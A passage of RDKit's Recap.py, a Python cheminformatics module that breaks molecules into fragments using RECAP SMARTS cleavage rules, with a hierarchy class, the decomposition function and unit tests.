"[C:1]=!@[C:2]>>[C:1][*].[*][C:2]", # olefin
"[n;+0:1]-!@[C:2]>>[n:1][*].[C:2][*]", # aromatic nitrogen - aliphatic carbon
"[O:3]=[C:4]-@[N;+0:1]-!@[C:2]>>[O:3]=[C:4]-[N:1][*].[C:2][*]", # lactam nitrogen - aliphatic carbon
"[c:1]-!@[c:2]>>[c:1][*].[*][c:2]", # aromatic carbon - aromatic carbon
"[n;+0:1]-!@[c:2]>>[n:1][*].[*][c:2]", # aromatic nitrogen - aromatic carbon *NOTE* this is not part of the standard recap set.
"[#7;+0;D2,D3:1]-!@[S:2](=[O:3])=[O:4]>>[#7:1][*].[*][S:2](=[O:3])=[O:4]", # sulphonamide
)
reactions = tuple([Reactions.ReactionFromSmarts(x) for x in reactionDefs])
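def _exampleApplySingleRule():
  """ Illustrative sketch (editor's addition, not part of the RECAP module): applies one
  rule by hand.  Index 1 in the reactions tuple is the amide definition above, and
  N-benzylacetamide is just a demonstration input.
  """
  mol = Chem.MolFromSmiles('CC(=O)NCc1ccccc1')
  productSets = reactions[1].RunReactants((mol,))
  if not productSets:
    return []
  frags = []
  for frag in productSets[0]:
    # reaction products need sanitization before SMILES generation
    Chem.SanitizeMol(frag)
    frags.append(Chem.MolToSmiles(frag, 1))
  return frags  # two fragments, each capped with a [*] dummy atom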
class RecapHierarchyNode(object):
""" This class is used to hold the Recap hiearchy
"""
mol=None
children=None
parents=None
smiles = None
def __init__(self,mol):
self.mol=mol
self.children = {}
self.parents = {}
def GetAllChildren(self):
" returns a dictionary, keyed by SMILES, of children "
res = {}
for smi,child in iteritems(self.children):
res[smi] = child
child._gacRecurse(res,terminalOnly=False)
return res
def GetLeaves(self):
" returns a dictionary, keyed by SMILES, of leaf (terminal) nodes "
res = {}
for smi,child in iteritems(self.children):
if not len(child.children):
res[smi] = child
else:
child._gacRecurse(res,terminalOnly=True)
return res
def getUltimateParents(self):
""" returns all the nodes in the hierarchy tree that contain this
node as a child
"""
if not self.parents:
res = [self]
else:
res = []
for p in self.parents.values():
for uP in p.getUltimateParents():
if uP not in res:
res.append(uP)
return res
def _gacRecurse(self,res,terminalOnly=False):
for smi,child in iteritems(self.children):
if not terminalOnly or not len(child.children):
res[smi] = child
child._gacRecurse(res,terminalOnly=terminalOnly)
def __del__(self):
self.children={}
    self.parents={}
self.mol=None
def RecapDecompose(mol,allNodes=None,minFragmentSize=0,onlyUseReactions=None):
""" returns the recap decomposition for a molecule """
mSmi = Chem.MolToSmiles(mol,1)
if allNodes is None:
allNodes={}
if mSmi in allNodes:
return allNodes[mSmi]
res = RecapHierarchyNode(mol)
res.smiles =mSmi
activePool={mSmi:res}
allNodes[mSmi]=res
while activePool:
nSmi = next(iterkeys(activePool))
node = activePool.pop(nSmi)
if not node.mol: continue
for rxnIdx,reaction in enumerate(reactions):
if onlyUseReactions and rxnIdx not in onlyUseReactions:
continue
#print ' .',nSmi
#print ' !!!!',rxnIdx,nSmi,reactionDefs[rxnIdx]
ps = reaction.RunReactants((node.mol,))
#print ' ',len(ps)
if ps:
for prodSeq in ps:
seqOk=True
# we want to disqualify small fragments, so sort the product sequence by size
# and then look for "forbidden" fragments
tSeq = [(prod.GetNumAtoms(onlyExplicit=True),idx) for idx,prod in enumerate(prodSeq)]
tSeq.sort()
ts=[(x,prodSeq[y]) for x,y in tSeq]
prodSeq=ts
for nats,prod in prodSeq:
try:
Chem.SanitizeMol(prod)
except:
continue
pSmi = Chem.MolToSmiles(prod,1)
if minFragmentSize>0:
nDummies = pSmi.count('*')
if nats-nDummies<minFragmentSize:
seqOk=False
break
# don't forget after replacing dummy atoms to remove any empty
# branches:
elif pSmi.replace('[*]','').replace('()','') in ('','C','CC','CCC'):
seqOk=False
break
prod.pSmi = pSmi
if seqOk:
for nats,prod in prodSeq:
pSmi = prod.pSmi
#print '\t',nats,pSmi
if not pSmi in allNodes:
pNode = RecapHierarchyNode(prod)
pNode.smiles=pSmi
pNode.parents[nSmi]=weakref.proxy(node)
node.children[pSmi]=pNode
activePool[pSmi] = pNode
allNodes[pSmi]=pNode
else:
pNode=allNodes[pSmi]
pNode.parents[nSmi]=weakref.proxy(node)
node.children[pSmi]=pNode
#print ' >>an:',allNodes.keys()
return res
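# Illustrative sketches of the optional arguments (comments only, not executed
# at import time; the molecules and counts come from the unit tests below):
#
#   Sharing the allNodes cache across calls reuses fragments that two molecules
#   have in common:
#   >>> cache = {}
#   >>> _ = RecapDecompose(Chem.MolFromSmiles('c1ccccc1-c1ncccc1'), allNodes=cache)
#   >>> len(cache)  # the root plus two aromatic fragments
#   3
#   >>> _ = RecapDecompose(Chem.MolFromSmiles('COc1ccccc1-c1ncccc1'), allNodes=cache)
#   >>> len(cache)  # only two new nodes are added
#   5
#
#   minFragmentSize suppresses cleavages that would produce fragments below a
#   given atom count:
#   >>> res = RecapDecompose(Chem.MolFromSmiles('CCCOCCC'), minFragmentSize=3)
#   >>> list(res.GetLeaves().keys())
#   ['[*]CCC']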
# ------- ------- ------- ------- ------- ------- ------- -------
# Begin testing code
if __name__=='__main__':
import unittest
class TestCase(unittest.TestCase):
def test1(self):
m = Chem.MolFromSmiles('C1CC1Oc1ccccc1-c1ncc(OC)cc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.children.keys())==4)
self.assertTrue(len(res.GetAllChildren().keys())==5)
self.assertTrue(len(res.GetLeaves().keys())==3)
def test2(self):
m = Chem.MolFromSmiles('CCCOCCC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(res.children=={})
def test3(self):
allNodes={}
m = Chem.MolFromSmiles('c1ccccc1-c1ncccc1')
res = RecapDecompose(m,allNodes=allNodes)
self.assertTrue(res)
self.assertTrue(len(res.children.keys())==2)
self.assertTrue(len(allNodes.keys())==3)
m = Chem.MolFromSmiles('COc1ccccc1-c1ncccc1')
res = RecapDecompose(m,allNodes=allNodes)
self.assertTrue(res)
self.assertTrue(len(res.children.keys())==2)
# we get two more nodes from that:
self.assertTrue(len(allNodes.keys())==5)
self.assertTrue('[*]c1ccccc1OC' in allNodes)
self.assertTrue('[*]c1ccccc1' in allNodes)
m = Chem.MolFromSmiles('C1CC1Oc1ccccc1-c1ncccc1')
res = RecapDecompose(m,allNodes=allNodes)
self.assertTrue(res)
self.assertTrue(len(res.children.keys())==4)
self.assertTrue(len(allNodes.keys())==10)
def testSFNetIssue1801871(self):
m = Chem.MolFromSmiles('c1ccccc1OC(Oc1ccccc1)Oc1ccccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertFalse('[*]C([*])[*]' in ks)
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]C([*])Oc1ccccc1' in ks)
def testSFNetIssue1804418(self):
m = Chem.MolFromSmiles('C1CCCCN1CCCC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]N1CCCCC1' in ks)
self.assertTrue('[*]CCCC' in ks)
def testMinFragmentSize(self):
m = Chem.MolFromSmiles('CCCOCCC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(res.children=={})
res = RecapDecompose(m,minFragmentSize=3)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==1)
ks = res.GetLeaves().keys()
self.assertTrue('[*]CCC' in ks)
m = Chem.MolFromSmiles('CCCOCC')
res = RecapDecompose(m,minFragmentSize=3)
self.assertTrue(res)
self.assertTrue(res.children=={})
m = Chem.MolFromSmiles('CCCOCCOC')
res = RecapDecompose(m,minFragmentSize=2)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]CCC' in ks)
ks = res.GetLeaves().keys()
self.assertTrue('[*]CCOC' in ks)
def testAmideRxn(self):
m = Chem.MolFromSmiles('C1CC1C(=O)NC1OC1')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C(=O)C1CC1' in ks)
self.assertTrue('[*]NC1CO1' in ks)
m = Chem.MolFromSmiles('C1CC1C(=O)N(C)C1OC1')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C(=O)C1CC1' in ks)
self.assertTrue('[*]N(C)C1CO1' in ks)
m = Chem.MolFromSmiles('C1CC1C(=O)n1cccc1')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C(=O)C1CC1' in ks)
self.assertTrue('[*]n1cccc1' in ks)
m = Chem.MolFromSmiles('C1CC1C(=O)CC1OC1')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('C1CCC(=O)NC1')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('CC(=O)NC')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
m = Chem.MolFromSmiles('CC(=O)N')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('C(=O)NCCNC(=O)CC')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.children)==4)
self.assertTrue(len(res.GetLeaves())==3)
def testEsterRxn(self):
m = Chem.MolFromSmiles('C1CC1C(=O)OC1OC1')
res = RecapDecompose(m,onlyUseReactions=[2])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C(=O)C1CC1' in ks)
self.assertTrue('[*]OC1CO1' in ks)
m = Chem.MolFromSmiles('C1CC1C(=O)CC1OC1')
res = RecapDecompose(m,onlyUseReactions=[2])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('C1CCC(=O)OC1')
res = RecapDecompose(m,onlyUseReactions=[2])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testUreaRxn(self):
m = Chem.MolFromSmiles('C1CC1NC(=O)NC1OC1')
res = RecapDecompose(m,onlyUseReactions=[0])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]NC1CC1' in ks)
self.assertTrue('[*]NC1CO1' in ks)
m = Chem.MolFromSmiles('C1CC1NC(=O)N(C)C1OC1')
res = RecapDecompose(m,onlyUseReactions=[0])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]NC1CC1' in ks)
self.assertTrue('[*]N(C)C1CO1' in ks)
m = Chem.MolFromSmiles('C1CCNC(=O)NC1C')
res = RecapDecompose(m,onlyUseReactions=[0])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('c1cccn1C(=O)NC1OC1')
res = RecapDecompose(m,onlyUseReactions=[0])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]n1cccc1' in ks)
self.assertTrue('[*]NC1CO1' in ks)
m = Chem.MolFromSmiles('c1cccn1C(=O)n1c(C)ccc1')
res = RecapDecompose(m,onlyUseReactions=[0])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]n1cccc1C' in ks)
def testAmineRxn(self):
m = Chem.MolFromSmiles('C1CC1N(C1NC1)C1OC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==3)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C1CC1' in ks)
self.assertTrue('[*]C1CO1' in ks)
self.assertTrue('[*]C1CN1' in ks)
m = Chem.MolFromSmiles('c1ccccc1N(C1NC1)C1OC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==3)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]C1CO1' in ks)
self.assertTrue('[*]C1CN1' in ks)
m = Chem.MolFromSmiles('c1ccccc1N(c1ncccc1)C1OC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==3)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]c1ccccn1' in ks)
self.assertTrue('[*]C1CO1' in ks)
m = Chem.MolFromSmiles('c1ccccc1N(c1ncccc1)c1ccco1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==3)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]c1ccccn1' in ks)
self.assertTrue('[*]c1ccco1' in ks)
m = Chem.MolFromSmiles('C1CCCCN1C1CC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]N1CCCCC1' in ks)
self.assertTrue('[*]C1CC1' in ks)
m = Chem.MolFromSmiles('C1CCC2N1CC2')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testEtherRxn(self):
m = Chem.MolFromSmiles('C1CC1OC1OC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C1CC1' in ks)
self.assertTrue('[*]C1CO1' in ks)
m = Chem.MolFromSmiles('C1CCCCO1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('c1ccccc1OC1OC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]C1CO1' in ks)
m = Chem.MolFromSmiles('c1ccccc1Oc1ncccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]c1ccccn1' in ks)
def testOlefinRxn(self):
m = Chem.MolFromSmiles('ClC=CBr')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]CCl' in ks)
self.assertTrue('[*]CBr' in ks)
m = Chem.MolFromSmiles('C1CC=CC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testAromNAliphCRxn(self):
m = Chem.MolFromSmiles('c1cccn1CCCC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]n1cccc1' in ks)
self.assertTrue('[*]CCCC' in ks)
m = Chem.MolFromSmiles('c1ccc2n1CCCC2')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testLactamNAliphCRxn(self):
m = Chem.MolFromSmiles('C1CC(=O)N1CCCC')
res = RecapDecompose(m,onlyUseReactions=[8])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]N1CCC1=O' in ks)
self.assertTrue('[*]CCCC' in ks)
m = Chem.MolFromSmiles('O=C1CC2N1CCCC2')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testAromCAromCRxn(self):
m = Chem.MolFromSmiles('c1ccccc1c1ncccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]c1ccccn1' in ks)
m = Chem.MolFromSmiles('c1ccccc1C1CC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testAromNAromCRxn(self):
m = Chem.MolFromSmiles('c1cccn1c1ccccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]n1cccc1' in ks)
self.assertTrue('[*]c1ccccc1' in ks)
def testSulfonamideRxn(self):
m = Chem.MolFromSmiles('CCCNS(=O)(=O)CC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]NCCC' in ks)
self.assertTrue('[*]S(=O)(=O)CC' in ks)
m = Chem.MolFromSmiles('c1cccn1S(=O)(=O)CC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]n1cccc1' in ks)
self.assertTrue('[*]S(=O)(=O)CC' in ks)
m = Chem.MolFromSmiles('C1CNS(=O)(=O)CC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testSFNetIssue1881803(self):
m = Chem.MolFromSmiles('c1ccccc1n1cccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
m = Chem.MolFromSmiles('c1ccccc1[n+]1ccccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('C1CC1NC(=O)CC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
m = Chem.MolFromSmiles('C1CC1[NH+]C(=O)CC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('C1CC1NC(=O)NC1CCC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
m = Chem.MolFromSmiles('C1CC1[NH+]C(=O)[NH+]C1CCC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
unittest.main()
|
soerendip42/rdkit
|
rdkit/Chem/Recap.py
|
Python
|
bsd-3-clause
| 21,394
|